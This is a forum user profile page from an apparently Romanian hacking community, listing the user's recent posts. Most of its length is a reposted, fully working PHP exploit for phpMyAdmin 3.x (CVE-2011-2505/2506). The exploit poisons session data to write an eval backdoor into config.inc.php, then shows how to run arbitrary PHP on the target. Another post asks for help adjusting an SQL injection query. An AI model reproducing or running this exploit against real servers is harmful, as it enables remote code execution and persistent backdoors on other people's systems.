Jump to content

xaren

Members
  • Posts

    23
  • Joined

  • Last visited

  • Days Won

    1

xaren last won the day on July 27 2011

xaren had the most liked content!

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

xaren's Achievements

Newbie

Newbie (1/14)

500

Reputation

  1. Unknown column 'rank' in 'order clause' As putea inlocui rank ala cu o cifra sau @@version sau ... ? !
  2. <?php /* # Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit # Date: 2011-07-09 # Author: Mango of ha.xxor.se # Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 # CVE : CVE-2011-2505, CVE-2011-2506 # Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt # Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html */ echo php_sapi_name()!=='cli'?'<pre>':'';?> . , )\ . . ,/) , / ) , )\ )\( /)/( (__( /( / ) __ __ ________ __ __ / \ ( )| |) \ / | |\ /| | | | | | | | (__) ( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____ \| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | | | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__| ==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] [] Remote Code Injection [] [][] [] [] [] [] [] [] http://ha.xxor.se [][] [] [] [] [][] [][] [] [] _ _ ___ __ ____ __ ___ ___ | |-| || _ |\ /\ /| _ || ) |_|-|_||_|_|/_._\/_._\|___||_|_\ ___ ___ ___ _ _ ___ ___ __ __ ( < | [_ / /| || || )(_)| |\ | / >__)|_[_ \__\|____||_|_\|_| |_| |_| Use responsibly. <?php echo php_sapi_name()!=='cli'?'</pre>':''; if(php_sapi_name()==='cli'){ if(!isset($argv[1])){ output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2"); killme(); } $pmaurl = $argv[1]; }else{ $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:''; } $code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);'; $cookie = null; $token = null; if(!function_exists('curl_init')){ output('[!] Fatal error. Need cURL!'); killme(); } $ch = curl_init(); $debug = 0; if(php_sapi_name()!=='cli'){ ?> <form method=post> URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/> <input name=submit type=submit value=?> </form> <pre> <?php if(!isset($_REQUEST['submit']))killme(true); } output("[i] Running..."); // Start a session and get a token curl_setopt_array($ch, array( CURLOPT_URL => $pmaurl.'/setup/index.php', CURLOPT_HEADER => 1, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false )); output("[*] Contacting server to retrive session cookie and token."); $result = curl_exec($ch); if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){ output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url."); killme(); } if(!$result){ output("[!] cURL error:".curl_error($ch)); killme(); } if(false !== strpos($result, 'Cannot load or save configuration')){ output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist."); killme(); } // Extract cookie preg_match('/phpMyAdmin=([^;]+)/', $result, $matches); $cookie = $matches[1]; output("[i] Cookie:".$cookie); // Extract token preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches); $token = $matches[2]; output("[i] Token:".$token); // Poison _SESSION variable curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token); curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie); output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); // Save file curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token); output("[*] Contacting server to make it save the injected code to a file."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);'); curl_setopt($ch, CURLOPT_POST, 0); output("[*] Contacting server to test if the injected code executes."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){ output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!"); output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';"); }else{ output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable."); } curl_close($ch); function output($msg){ echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n"; flush(); } function killme(){ output("[*] Exiting..."); echo php_sapi_name()!=='cli'?'<pre>':''; die(); } echo php_sapi_name()!=='cli'?'<pre>':'';?> Nu l-am testat. Sursa : phpMyAdmin 3.x Swekey Remote Code Injection Exploit
  3. Te referi la mine ?
  4. L-am incercat acum 20 minute dar da erori de sintaxa
  5. xaren

    xaren here

    De ce imi spui xarenWo ? cine esti ? si apropo numele vechi era xareNwo nu xarenWo in fine.. sunt xaren si gata !
  6. xaren

    xaren here

    Name : Andrew Codename : xaren Age : =< 18 Location : Europe I speak : Romanian, English, Italian I like : girls, biking, programming, music, "hacking", and many others not as important as these. My Knowledges : php, sql, html, css, photoshop, illustrator, rfi, lfi, mysqli, mssqli, rce, linux, windows .. to be continued... Other : Sunt roman
×
×
  • Create New...